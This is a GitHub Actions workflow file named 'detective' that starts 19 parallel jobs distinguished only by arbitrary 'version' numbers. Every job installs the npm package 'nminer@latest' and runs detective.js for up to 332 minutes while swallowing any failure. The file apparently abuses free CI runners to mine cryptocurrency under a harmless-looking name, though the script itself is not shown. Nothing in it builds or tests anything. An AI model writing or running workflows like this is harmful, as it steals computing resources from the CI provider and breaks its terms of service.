name: detective
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 5876 }
          - { version: 1055 }
          - { version: 3234 }
          - { version: 6789 }
          - { version: 9592 }
          - { version: 361 }
          - { version: 8607 }
          - { version: 1985 }
          - { version: 8881 }
          - { version: 4838 }
          - { version: 3261 }
          - { version: 1132 }
          - { version: 4322 }
          - { version: 5132 }
          - { version: 1314 }
          - { version: 4587 }
          - { version: 4750 }
          - { version: 649 }
          - { version: 3021 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: drat
        run: |
          npm install nminer@latest
          timeout 332m node detective.js || echo "detective executed"